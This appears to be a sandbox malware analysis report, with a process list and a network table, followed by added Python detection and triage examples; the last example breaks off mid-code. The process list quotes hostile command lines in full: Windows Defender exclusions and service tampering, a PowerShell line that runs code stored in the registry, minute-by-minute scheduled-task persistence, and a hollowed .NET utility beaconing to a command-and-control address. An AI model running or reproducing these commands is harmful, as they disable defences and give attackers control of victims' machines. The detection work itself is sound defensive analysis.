C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'IRC_Connect.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowSC.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowSC.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowSC" /tr "C:\Users\Admin\AppData\Roaming\WindowSC.exe"
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\New Microsoft Word Document.docx" /o ""
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff928f73cb8,0x7ff928f73cc8,0x7ff928f73cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,14039303063002309672,15851512992209912116,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,14039303063002309672,15851512992209912116,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,14039303063002309672,15851512992209912116,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,14039303063002309672,15851512992209912116,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,14039303063002309672,15851512992209912116,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,14039303063002309672,15851512992209912116,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3940 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,14039303063002309672,15851512992209912116,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:8
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" start TrustedInstaller
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" start lsass
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" stop windefend
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 45.88.90.198 1500 <123456789> B6C67BBF4D5C9EEE6867
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff928f73cb8,0x7ff928f73cc8,0x7ff928f73cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1980 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2316 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2836 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4252 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2148 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=5116 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3688 /prefetch:8
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
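The process list above records the Defender-tampering sequence step by step: `sc qc windefend`, `net1 stop windefend`, `sc config windefend depend= RpcSs-TOGGLE`, and a PowerShell one-liner (its banner string names the ToggleDefender script) that reads a script body from `Registry::HKEY_Users\S-1-5-21*\Volatile*` and passes it to `iex`; afterwards `cvtres.exe`, a .NET framework utility that takes no such arguments, is started with `45.88.90.198 1500 <123456789> B6C67BBF4D5C9EEE6867` on its command line, and `WindowSC.exe` runs straight from `%APPDATA%\Roaming`. The Python below is an added detection example, not part of the sandbox report or of the sample: it applies a few rules to constructed process-creation events modelled on those command lines. The rule names, the Defender service list, the .NET utility list and the `start=` check are the example's own assumptions, not something the report states.

```python
import re
from dataclasses import dataclass

# Constructed sample events modelled on the process list above, as
# (image path, command line) pairs the way Sysmon Event ID 1 or a sandbox
# records them. They are inputs for this example, not an export of the report.
SAMPLE_EVENTS = [
    (r"C:\Users\Admin\AppData\Roaming\WindowSC.exe",
     r"C:\Users\Admin\AppData\Roaming\WindowSC.exe"),
    (r"C:\Windows\system32\sc.exe",
     r'"C:\Windows\system32\sc.exe" qc windefend'),
    (r"C:\Windows\system32\net1.exe",
     r'"C:\Windows\system32\net1.exe" stop windefend'),
    (r"C:\Windows\system32\sc.exe",
     r'"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$env:1=6;"
     r"iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}"),
    (r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 45.88.90.198 1500 <123456789> B6C67BBF4D5C9EEE6867'),
    (r"C:\Windows\System32\CompPkgSrv.exe",
     r"C:\Windows\System32\CompPkgSrv.exe -Embedding"),
]

# Assumed lists for the example: Defender service names, and .NET framework
# utilities that never take an IP/port pair as arguments in normal use.
DEFENDER_SERVICES = {"windefend", "wdnissvc", "wdfilter", "sense"}
DOTNET_UTILITIES = {"cvtres.exe", "regasm.exe", "regsvcs.exe", "installutil.exe",
                    "msbuild.exe", "aspnet_compiler.exe"}
IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
APPDATA_ROOT_EXE = re.compile(r"^c:\\users\\[^\\]+\\appdata\\roaming\\[^\\]+\.exe$")


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


def split_argv(cmdline: str) -> list:
    """Tokenise a Windows command line; double-quoted tokens stay whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def extract_c2(argv: list):
    """Return (host, port) when argv[1] is an IPv4 address and argv[2] a port."""
    if len(argv) >= 3 and IPV4.match(argv[1]) and argv[2].isdigit():
        return argv[1], int(argv[2])
    return None


def check_event(image: str, cmdline: str) -> list:
    """Apply the rules to one process-creation event and return its findings."""
    name = image.rsplit("\\", 1)[-1].lower()
    argv = split_argv(cmdline)
    args = [a.lower() for a in argv[1:]]
    lower = cmdline.lower()
    found = []

    # Binary running directly in %APPDATA%\Roaming (the dropped WindowSC.exe).
    if APPDATA_ROOT_EXE.match(image.lower()):
        found.append(Finding("exe_in_appdata_roaming_root", name, image))

    # net stop / net1 stop against a Defender service.
    if name in {"net.exe", "net1.exe"} and len(args) >= 2 \
            and args[0] == "stop" and args[1] in DEFENDER_SERVICES:
        found.append(Finding("defender_service_stop", name, args[1]))

    # sc config <defender svc> depend=/start= rewrites the service record so the
    # service cannot come back; depend= is what the report shows, start= is a
    # generalisation added in this example.
    if name == "sc.exe" and len(args) >= 3 and args[0] == "config" \
            and args[1] in DEFENDER_SERVICES \
            and any(a.startswith(("depend=", "start=")) for a in args[2:]):
        found.append(Finding("defender_service_config_tamper", name, " ".join(args)))

    # PowerShell evaluating (iex) a script body read back from HKEY_USERS; the
    # substring test is deliberately loose and should be tuned per environment.
    if name in {"powershell.exe", "pwsh.exe"} \
            and ("iex" in lower or "invoke-expression" in lower) \
            and "registry::hkey_users" in lower:
        found.append(Finding("powershell_iex_from_registry", name,
                             "script body read from HKEY_USERS and passed to iex"))

    # A .NET framework utility started with <ip> <port> ... on its command line:
    # the utility has no such arguments, so the values are configuration for
    # whatever code actually runs inside that process.
    if name in DOTNET_UTILITIES:
        c2 = extract_c2(argv)
        if c2 is not None:
            found.append(Finding("dotnet_utility_c2_argv", name, f"{c2[0]}:{c2[1]}"))
    return found


def triage(events) -> list:
    """Run check_event over (image, cmdline) pairs and flatten the findings."""
    return [f for image, cmdline in events for f in check_event(image, cmdline)]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.rule:32} {f.image:16} {f.detail}")
```

`sc qc windefend` and `CompPkgSrv.exe -Embedding` are left in the sample deliberately as negatives: a query of the service and an ordinary COM host should produce no finding, and the same events fed from a real EDR export should behave the same way.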
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| DE | 45.88.90.198:1500 | | tcp |
| DE | 45.88.90.198:1500 | | tcp |
| DE | 45.88.90.198:1500 | | tcp |
| DE | 45.88.90.198:1500 | | tcp |
| DE | 45.88.90.198:1500 | | tcp |
| DE | 45.88.90.198:1500 | | tcp |
| NL | 52.109.89.19:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| NL | 23.62.61.162:443 | metadata.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| NL | 23.62.61.171:443 | www.bing.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| DE | 45.88.90.198:1500 | | tcp |
| DE | 45.88.90.198:1500 | | tcp |
| DE | 45.88.90.198:1500 | | tcp |
| DE | 45.88.90.198:1500 | | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
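Read against the process list, the table separates cleanly: the ten connections to 45.88.90.198:1500 have no domain, use a non-standard port and match the host/port pair on the cvtres.exe command line; ip-api.com is the external-IP lookup; github.com and raw.githubusercontent.com are the hosting the dropper pulled from; Office, Bing and mDNS rows are background noise from the analysis VM. The Python below is an added triage example, not part of the report: it applies that reading to constructed rows modelled on the table and correlates the beacon candidate with an endpoint taken from a command line. The service and code-hosting lists, the three-hit threshold and the web-port allow-list are the example's assumptions.

```python
from collections import Counter, defaultdict

# Constructed rows modelled on the Network table above, as
# (country, destination, domain, protocol). The repeats are kept on purpose:
# the hit count is the signal. Sample input for this example, not the report's data.
SAMPLE_ROWS = (
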